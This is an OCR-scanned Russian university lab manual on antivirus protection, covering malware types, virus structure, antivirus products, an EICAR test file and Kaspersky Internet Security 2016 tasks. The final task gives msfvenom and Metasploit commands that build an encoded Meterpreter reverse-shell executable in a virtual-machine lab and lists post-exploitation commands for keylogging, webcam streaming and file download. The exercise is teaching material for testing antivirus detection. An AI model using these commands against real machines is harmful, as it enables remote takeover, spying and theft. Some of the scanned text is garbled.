Кафедра “Управление и защита...
TRANSCRIPT
Федеральное государственное бюджетное образовательное учреждение высшего профессионального образования “Московский государственный университет путей
сообщения Императора Николая II”
Кафедра “Управление и защита информации” М.Я. Клепцов
Средства антивирусной защиты информации в компьютерных системахМетодические указания к лабораторной работе
Средства антивирусной защиты
“Установка и изучение функциональных возможностей
антивируса Kaspersky Internet Security 2016'’
Автор
Клепцов М Л. проф., д.т.н.
Федеральное государственное бюджетное образовательное учреждение высшего профессионального образования “Московский
государственный университет путей сообщения Императора Николая II”
Кафедра “Управление и защита информации”
М.Я. Клепцов
Средства антивирусной защиты информации в компьютерных системахМетодические указания к лабораторной работе
Рекомендовано редакционно-издательским советом университета в качестве методических указаний
для студентов специальности “Компьютерная безопасность”
г. Москва, 2017
Клепцов М Л. Средства антивирусной защиты информации в компьютерных системах. Методические указания к лабораторной работе М.: МГУПС (МИИТ), 2017 .-21 с
Методические указания содержат теоретические сведения о компьютерных вирусах и вредоносном ПО.Даны задания на выполнение лабораторной работы и указан порядок их
выполнения.
1.Термины и обозначения
Вирус. Если просто, то это самовоспроизводящийся программный код,
который внедряется в установленные программы без согласия пользователя.
Вирусы можно разделить по типу объектов, которые они заражают, по
методам заражения и выбора жертв. Вирусы можно подцепить разными
способами: от нажатия вредоносной ссылки или файла в неизвестном письме
до заражения на вредоносном сайте. При этом вирус может выполнять
множество разных задач, направленных в первую очередь на принесение
вреда операционной системе. В настоящее время вирусы довольно редки, так
как создатели вредоносного ПО стараются держать свои программы и их
распространение под контролем. В противном случае вирус довольно быстро
попадает в руки антивирусных компаний.
Червь. Черви являются в некотором роде вирусами, так как созданы на
основе саморазмножающихся программ. Однако черви не могут заражать
существующие файлы. Вместо этого червь поселяется в компьютер
отдельным файлом и ищет уязвимости в Сети или системе для дальнейшего
распространения себя. Черви также могут подразделяться по способу
заражения (электронная почта, мессенджеры, обмен файлами и пр.).
Некоторые черви существуют в виде сохраненных на жестком диске файлов,
а некоторые поселяются лишь в оперативной памяти компьютера.
Троян. По своему действию является противоположностью вирусам и
червям. Его предлагают загрузить под видом законного приложения, однако
вместо заявленной функциональности он делает то, что нужно
злоумышленникам. Троянцы получили свое название от одноименного
печально известного мифологического коня, так как- под видом какой-либо
полезной программы или утилиты в систему проникает деструктивный
элемент. Трояны не еамовоспроизводятся и не распространяются сами по
себе. Однако с увеличением вала информации и файлов в Интернете трояна
стало довольно легко подцепить. Нынешние трояны эволюционировали до
таких сложных форм, как, например, бэкдор (троян, пытающийся взять на
себя администрирование компьютера) и троян-загрузчик (устанавливает на
компьютер жертвы вредоносный код).
Руткит. В современном мире руткит представляет собой особую часть
вредоносных программ, разработанных специально, чтобы скрыть
присутствие вредоносного кода и его действия от пользователя и
установленного защитного программного обеспечения. Это возможно
благодаря тесной интеграции руткита с операционной системой. А
некоторые руткиты могут начать свою работ)' прежде, чем загрузится
операционная система. Таких называют буткитами. Однако, как бы ни
развивался этот тип вредоносов, сложные современные антивирусные
программы в состоянии обнаружить и обезвредить практически все
существующие разновидности руткитов.
Бэкдор (средство удаленного администрирования). Бэкдор. или RAT (remote
administration tool), — это приложение, которое позволяет честному
системному администратору или злобному злоумышленнику управлять
вашим компьютером на расстоянии. В зависимости от функциональных
особенностей конкрентного бэкдора, хакер может установить и запустить на
компьютере жертвы любое программное обеспечение, сохранять все нажатия
клавиш, загружать и сохранять любые файлы, включать микрофон или
камеру. Словом, брать на себя контроль за компьютером и информацией
жертвы.
Загрузчик. Небольшая часть кода, используемоая для дальнейшей загрузки
и установки полной версии вредоноса. После того как загрузчик попадает в
систему путем сохранения вложения электронного письма или, например,
при просмотре зараженной картинки, он соединяется с удаленным сервером
и загружает весь вредонос.
2. Теоретические сведения.
2.1 Вредоносное ПО
Вредоносное программное обеспечение создано с целью нарушения
конфиденциальности, целостности и доступности информации,
циркулирующей в информационной сфере. Классификация вредоносного
ПО: - Троянская программа
- Вирус
- Червь
- Потенциально-опасное ПО
- Потенциально-нежелательное ПО - ПО, представляющее угрозу для
корпоративной сети
- Троянская программа — ПО, проникающее в компьютер под видом
легального. Существует множество различных троянских программ, в том
числе шпионы, загрузчики, бэкдоры, вымогатели и пр. Вирус - вредоносное
ПО, способное к самокопированию на компьютере. Червь — вредоносное
ПО, распростроняющееся между компьютерами. Потенциально-опасное ПО
- легальные программы, которые с определёнными настройками могут
использоваться как вредоносные. Потенциально-нежелательное ПО —
программа, устанавливающая вместе с собой программы, не ожидаемые
пользователем. ПО, представляющее угрозу для корпоративной сети —
легальное ПО, которое может использоваться злоумышленником.
Компьютерные вирусы - это разновидность компьютерных
программ, отличительной особенностью которых является
способность к размножению (саморепликации). В дополнение к
этому они могут распространяться, например, внедряя свой код в
другие программы, могут повреждать или полностью уничтожать
данные, подконтрольные пользователю от имени которого была
запущена заражённая вирусом программа.
Классический вирус ничего не трогает - он просто живёт и
распространяется. Одна это не значит, что он безвреден и не содержит
разрушительных функций.
Все вирусы вредны, так как они занимают системные ресурсы,
замедляют работу компьютера, загружают каналы передачи данных и
интернет ненужным трафиком, снижая тем самым производительность
сети.
Первое сообщение о появлении компьютерного вируса появилось в 1981
году. Это был вирус, поражающий сектора дискет компьютера Apple II.
Сообщения о фактах проявления компьютерных вирусов стали
появляться и в последующих годах. Начиная с 1987 года, количество
сообщений о вирусных проявлениях резко увеличилось.
Факты заражения компьютерными вирусами с достаточно серьёзными
последствиями нашли широкое освещение на страницах западной
прессы.
В эго же время, начиная с 1987 года, появились факты проявления
компьютерных вирусов и в нашей -стране. Впервые статистика
выявления компьютерных вирусов на территории СССР была приведена
на первой Всесоюзной научно-технической конференции “Методы и
средства защиты от компьютерных вирусов в операционной системе MS
DOS”, состоявшаяся в в Киеве, в ноябре 1990 года, которая имеет
следующий вид:
1987г. - 8 шт., 1988г. - 24 шт., 1989г. - 49 шт., 1990г. - 75 шт.
То есть явно прослеживается тенденция их увеличения и развития.
Следует обратить внимание на статистику 2006 года, представленную
национальной ассоциацией по компьютерной защите США, из которой
следует, что:
идентифицировано свыше 25000 вирусов
каждый месяц появляется более 50 новых видов компьютерных
вирусов
от каждой вирусной атаки, в среднем, наносится ущерб 142
персональным компьютерам. При этом, на отражение атак, в среднем,
затрачивается 2-4 дня.
для компенсации ущерба в 114 случаях потребовалось 5 дней.
2.2 Компьютерные вирусы.
Компьютерные вирусы - это разновидность компьютерных программ,
отличительной особенностью которых является способность к размножению
(саморегашкации). В дополнение к этому они могут распространяться,
например, внедряя свой код в другие программы, могут повреждать, или
полностью уничтожать данные, подконтрольные пользователю от имени
которого была запущена заражённая вирусом программа. Все вирусы
вредны, так как они занимают системные ресурсы, замедляют работу
компьютера, загружают каналы передачи данных и интернет ненужным
трафиком, снижая тем самым производительность сети. Первое сообщение о
появлении компьютерного вируса появилось в 1981 году. Это был вирус,
поражающий сектора дискет компьютера Apple II. В настоящее же время во
всём мире ежегодно выявляется не менее тысячи компьютерных вирусов.
Исходя из определения компьютерного вируса следует, что он обладает 2-
умя основными функциями: - способностью к саморазмножению; -
способностью выполнять определённые задачи в компьютерной системе или
сети. Рассмотрим его структуру и схему функционирования на примере
файлового вируса, которой поражает пользовательские программы и
уничтожает их как функциональный элемент КС._ _ _ _ _ " T v i R WORK
Структура вируса имеет следующий вид (набор кодов): Р - признак вируса,
указывающий на команду передачи управления, которая является
характерной для данного вируса. VIR - ядро вируса, состоящее из
совокупности программных кодов, реализующих основные функции вируса -
инфицирование (размножение). WORK - обрабатывающая задача, которая
реализует деструктивные функции, например, разрушение среды
функционирования, программ, данных. Механизм заражения вирусом
пользовательской программы следующий. Вызванная для исполнения
заражённая программа состоит из набора кодов вируса V (Р, VIR, WORK),
который размещён в начале тела пользовательской программы,
предназначенной для выполнения какой-то процедуры или функции. Когда
эта программа начинает исполняться, вирус (V) первым берёт управление на
себя, тем самым реализуя функцию инфицирования с помощью ядра VIR.
Ядро VIR, сканируя ОП ПК, осуществляет поиск незаражённой программы,
пропуская при этом уже заражённые этим вирусом (первым в них стоит
признак вируса Р). Определив незаражённую программу, ядро VIR выделяет
в ней место для записи кода вируса (как правило, в начале программы),
затирая начальные коды найденной незаражённой программы. Тем самым
уничтожается возможность выполнения функции, для которых была
предназначена данная программа. После заражения первой найденной
неинфицированной программы ядро вируса (V) может быть настроено на
дальнейшую реализацию процесса заражения.
Механизм заражения вирусом пользовательской программы следующий.
Вызванная для исполнения заражённая программа состоит из набора кодов
вируса V (Р, VIR, WORK), который размещён в начале тела
пользовательской программы, предназначенной для выполнения какой-то
процедуры или функции. Когда эта программа начинает исполняться, вирус
(V) первым берёт управление на себя, тем самым реализуя функцию
инфицирования с помощью ядра VIR. Ядро VIR, сканируя ОП ПК,
осуществляет поиск незаражённой программы, пропуская при этом уже
заражённые этим вирусом (первым в них стоит признак вируса Р). Определив
незаражённую программу, ядро VIR выделяет в ней место для записи кода
вируса (как правило, в начале программы), затирая начальные коды
найденной незаражённой программы. Тем самым уничтожается возможность
выполнения функции, для которых была предназначена данная программа.
После заражения первой найденной неинфицированной программы ядро
вируса (V) может быть настроено на дальнейшую реализацию процесса
заражения. В общем случае, когда вирус, заражая программу, сохраняет её,
он может находится в следующих состояниях:
• распространение по КС или сети;
• “спячка”
• запуск;
« разрушение программ, данных или программно-технической среды
системы.
1. - процесс распространения обязателен для любой программы-
вируса. Так как в результате загрузки и выполнения программы,
заражённой вирусом, происходит заражение других программ
посредством самокопирования вируса как в программы, так и
системные области.
2. - состояние “спячки” может быть использовано злоумышленником
как для сокрытия вируса, так и для создания уверенности в
правильности работы КС.
3. - Состояние запуска предполагает, как правило, наступление
ю
какого-либо события. Например, запуск вируса по дате или по
■заданному числу копирований.
4. - Последнее состояние может рассматриваться как деструктивное
воздействие вируса, приводящее к порче файловой системы на
винчестере, к разрушающим воздействиям на аппаратуру.
В настоящее время не существует единой классификации вирусоподобных
программ. Рассмотрим их классификацию по способам воздействия (рис. 1.1).
Рисунок 1.1
Люк — это секретная точка входа в программу, позволяющая получить
доступ в обход стандартных процедур защиты. Люк представляет
программный код, реагирующий на специальную последовательность
введённых с клавиатуры символов или последовательность каких-то
малозначимых событий. Люки позволяют недобросовестным программистам
получать несанкционированный доступ.
Логические бомбы - это одни из старых типов вредоносных
программ, которые назывались раньше “вирусами" и “червями”.
Логическая бомба - это программный код, внедрённый в какую-то
пользовательскую программу, которая запускается при определённых
условиях:
® наступление определённой даты:
а присутствие или отсутствие каких-то файлов:
Троянская программа представляет собой полезную или кажущуюся
полезной программу, содержащую скрытый код, который после запуска
программы-носителя выполняет нежелательные или разрушительные
функции.
Примером “Троянского коня” является компилятор, который
модифицирован с целью внедрения дополнительного кода в программы
определённого вида (например, вход в систему) в процессе
компиляции. Обнаружить по исходному коду такую программу
практически невозможно.
Классические вирусы различаются по сфере обитания и способу
заражения. Под средой обитания понимаются системные области
компьютера, ОС, приложения и так далее. Под способом заражения
понимается методы внедрения вирусного кода в заражаемые объекты
(Рис. 1.2)
По среде о<5и7ания классические вирусы
Рисунок 1.2
Бактерии - это программы, не повреждающие сами по себе никаких
файлов. Основное их назначение воспроизводить себе подобных.
Типичным примером бактерии может служить программа, способная
запустить две собственных копии в многозадачной среде или создать два
новых файла, содержащих по копии оригинальной программы-бактерии.
Бактерии, за счёт большой скорости размножения, могут приводить к
быстрому захвату всех ресурсов процессора, ОП и дискового
пространства. И как результат может произойти отказ в доступе
пользователю к этим ресурсам.
Сетевые черви подразделяются по:
• способам распространения
® способам запуска на заражённом компьютере
• методам внедрения в систему
® прочим характеристикам
Сетевые черви, использующие для распространения почтовые сервисы.
Когда червь отсылает в виде вложения в электронное письмо свою
копию или ссылку на свой файл, расположенный на речевом ресурсе.
Для отправки заражённых сообщений используются сервисы MS
OUTLOOK и функции WINDOWS MAPI.
Сетевые черви использующие для распространения такие сетевые
сервисы Internet (HTTP, FTP). В этом случае способом заражения
является копирование червя на сетевые ресурсы, проникновение червя
на компьютер через уязвимости в ОС и приложениях.
Существуют сетевые черви, паразитирующие на других червях или
троянских программах удалённого администрирования (BackDoor).
Многие Бэкдоры позволяют по определённой команде скачивать
уязвимый файл и запускать его на локальном диске.
В заключении сказанного отметим, что самым активным классом
вирусоподобных программ являются сетевые черви. В качестве каналов
доставки они используют каналы Internet.
Как правило, для построения защиты КС от вирусоподобных
программ используется три уровня:
® Уровень шлюза. В этом случае средства
антивирусной защиты устанавливаются на межсетевом экране (МЭК)
прокси-сервера или в точке подключения КС, например, к Internet.
® Уровень серверов. Антивирусные агенты
устанавливаются на файловые, почтовые, web-cepeepa и другие
серверы, имеющиеся в КС.
Уровень рабочих станций, при котором антивирусы
устанавливаются на все рабочие места (компьютеры) с возможностью
управления единой консолью.
Рисунок 1.3
Наиболее распространёнными средствами антивирусной защиты
являются:
• Антивирус Касперского Personal Pro. Программа работает
под управлением Windows 95/98/2000/PRO/EXP/Vista/7/8/10
• Докгор WEB. Для Windows 95-ХР. Программа представляет
комбинацию антивирусного сканера "Доктор WEB“ и
резидентного блокиратора SpIDerGuard, интегрированного в ОС.
® Norton Antivirus 2003 Professional Edition компании
Symantec. Это надёжная программа, обеспечивающая: проводить
профилактику быстро распространяющихся червей;
возможность детектирования почтовых червей; удаление
троянских червей в фоновом режиме.
e McAfee Virus Scan Professional 6.0. Он обеспечивает
обнаружение и удаление около 60000 вирусов, троянских
программ, вредоносных java- скриптов и Active-X.
® Panda Antivirus Titanium. Она защищает от вирусов,
троянских программ, вредоносных java-скриптов и Active-X.
1.1. Тестовый файл EICAR
Текстовый файл EICAR разработан Европейским институтом
компьютерных антивирусных исследований. EICAR - это небольшой,
68-байтный файл, который при запуске на незащищённом компьютере
вызывает уведомление "EICAR- STANDARD-ANTIVIRUS-TEST-
FILE!". Иных свойств вируса он не несёт. Однако если на компьютере
исправно работает антивирус, EICAR будет обнаружен и
заблокирован. Это происходит потому, что все ведущие производители
антивирусных программ договорились между собой считать EICAR
вирусом и применять к нему все правила и действия, применяемые к
настоящим вредоносным программам. 1.2. Уровни защиты
компьютерной сети Как правило, для построения защиты КС от
вирусоподобных программ используется три уровня:
• Уровень шлюза. В этом случае средства антивирусной
защиты устанавливаются на межсетевом экране (МЭК) прокси-
сервера или в точке подключения КС, например, к Internet.
® Уровень серверов. Антивирусные агенты устанавливаются
на файловые, почтовые, web и другие серверы, имеющиеся в КС.
« Уровень рабочих станций, при котором антивирусы
устанавливаются на все рабочие места (компьютеры) с
возможностью управления единой консолью.
1.2. Борьба с вредоносным программным обеспечением
Очень важным средством борьбы с вредоносным программным
обеспечением являются антивирусные программы, получившие
название из-за своего первого назначения - борьбы с вирусами.
Антивирусная программа - это компьютерная программа, которая
пытается определить, нейтрализовать или уничтожить вредоносные
программы. В своей работе эти программы используют различные
принципы для поиска и лечения зараженных файлов. Если
антивирусная программа обнаруживает вирус в файле, то она удаляет
из него программный код вируса. Если лечение невозможно, то
зараженный файл удаляется целиком. Имеются различные типы
антивирусных программ - полифаги, ревизоры, блокировщики,
вакцины и другие. Обычно методы воздействия интегрируются с
целью обеспечения надёжной многоуровневой защиты.
3. Задания к лабораторной работе
3.1 Задание №1. Установка и ознакомление с Kaspersky Internet
Security 2016.
Цель задания. Запустить виртуальную машину №1 с ОС «Windows 10»,
установить на неё антивирус Kaspersky Internet Security 2016. В качестве
версии выберите «Windows 10», остальные настройки можно оставить
стандартными.
После создания виртуальной машины запустите её. Далее требуется
установить антивирус Kaspersky Internet Security 2016. Все настройки можно
оставить стандартными.
3.2. Задание №2. Изучение антивируса
Цель задания. Ознакомиться с основными функциями и элементами
антивируса Kaspersky Internet Security 2016.
Запустите антивирус, используя иконку в трее или через меню «Пуск».
Изучите основные функции антивируса Kaspesky Internet Security 2016:
Файловый антивирус - проверка всех открываемых, сохраняемых и
запускаемых файлов
Контроль программ — контроль действий всех установленных на
компьютере программ
Защита от сетевых атак - защита компьютера от опасной сетевой
активности и атак
IM-антивирус — проверка трафика IM-клиентов на наличие
вредоносных фишинговых ссылок
- Почтовый антивирус — проверка входящих и исходящих сообщений
на наличие в них опасных объектов
Доступ к веб-камере - контроль доступа программ к веб-камере
Защита от сбора данных - защищает от сбора информации о вашей
активности на веб-сайтах
Веб-антивирус - проверка входящего веб-трафика и предотвращение
запуска на компьютере опасных скриптов
Сетевой экран - фильтрация сетевой активности и обеспечение
безопасности доступа в локальную сеть и интернет
- Мониторинг активности - отмена изменений, вызванных вредоносными
действиями программ
Контроль изменений в операционной системе - защита параметров
операционной системы, параметров сети и параметров браузера
Анти-снам - проверка входящих сообщений на нежелательную
корреспонденцию
Анти-баннер - блокирование показа баннеров на веб-страницах и в
интерфейсе некоторых программ
Безопасные платежи - защита обращений пользователя к веб-сайтам
банков и платёжных систем
3.3. Задание №2. Тестирование антивируса. Файл EICAR
Цель задания. Проверить работоспособность антивируса Kaspersky
Internet Security 2016 с помощью тестового файла EICAR.
Для создания тестового файла EICAR необходимо открыть текстовый
редактор и ввести следующую строку символов:
X50!P%@AP[4\PZX54(Pa)7CC)7}$EICAR-STANDARD-ANTIVIRUS-
TEST-FILE!$H+H* После этого следует сохранить файл с расширением
“.сот”. Антивирус должен обнаруживать файл сразу. Проверьте, что файл с
расширением “.txt” и файл в архиве также обнаруживает. Из проведённой
проверки видно, что антивирус работоспособен. Теперь можно приступить к
следующему тесту.
3.4. Задание №3. Тестирование антивируса. Создание shell.exe
Цель задания. Проверить работоспособность антивируса Kaspersky
Internet Security 2016 с помощью сгенерированного shell-файла.
Создайте виртуальную машину №2 с операционной системой «Kali Linux
2016.2» аналогично пункту 2.1.
Данное задание состоит из двух частей - генерация рабочего shell-файла и
тестирование антивируса.
Дня начала тестирования нужно узнать в какой сети находятся наши
компьютеры. На виртуальной машине №2 откройте терминал и введите
команду «route». В выведенной таблице указан ip-адрес сети с маской
192.168.0.0/24. Теперь нужно узнать какие компьютеры состоят в данной
сети. Сделать это можно с помощью команды «птар 192.168.0.0/24». Один из
найденных ip принадлежит виртуальной машине №2, в чём можно убедиться,
введя команду «ifconflg»
Далее нужно сгенерировать shell-файл, который позволит получить сессию
удалённого управления виртуальной машиной №1. Запустите следующую
команду: «msfvenom -р windows/meterpreter'reversetcp -е x86/shikata_ga nai -i
5 LHOST=l 92.168.0.3 LPORT=1234 -f exe x >/root/virus.exe».
« -p windows/meterpreter/reverse tcp » - полезная нагрузка
« -e x86/shikata_ga_nai -i 5 » - метод и количество шифрований
« LHOST= 192.168.0.3 » - ip-адрес машины №2
« LPORT=1234 » - порт, на котором произойдёт соединение.
« -f ехе » - формат файла « >/root/virus.exe » - путь
сохранения файла.
Далее откройте новое окно терминала. Командой «msfconsole» запустите
приложение Metasploit, предназначенное для управления shell-файлом.
Выполните ряд команд:
« use exploit/multi/handler » выбор утилиты для создания сессий
« set payload windows/meterpreter/bindtcp » - установка полезной нагрузки
« set LPORT 1234 » - установка порта
« set LHOST 192.168.0.3 » - установка ip-адреса
«exploit» - запуск
После запуска shell-файла на машине №1 создаётся сессия, после чего
можно удалённо управлять компьютером.
Теперь возможно использовать различные команды для управляя
машиной №1: « sysinfo » - получение информации о системе « ps » -
просмотр активных процессов « shell » - управление командной
строкой « reboot » - перезагрузка компьютера « download » - загрузка
какого-либо файл « screenshot » - скриншот экрана « run vnc » - вывод
изображения с монитора « keyscan start» - начало мониторинга за
клавиатурой « webcamstream » - трансляция с веб-камеры
Для выхода из сессии нужно ввести команду "exit".
Список Литературы
1) https://blog.kaspersky.m/klassifikaciya-vredonosnyx-programm/2200/
2) Информационная безопасность. Защита и нападение (2016)
Автор: Андрей Бирюков
3) Вьега Д., Лебланк Д., Ховард М. "24 смертных греха
компьютерной безопасности" (2010)
Заказ № з'У'З'б Уел.- печ. л. — У,6
Т и р а ж э к з . Формат 60x84/16
127994, Россия, г. Москва, ул. Образцова, дом 9, стр. 9, УПЦ ГИ МГУПС (МНИТ)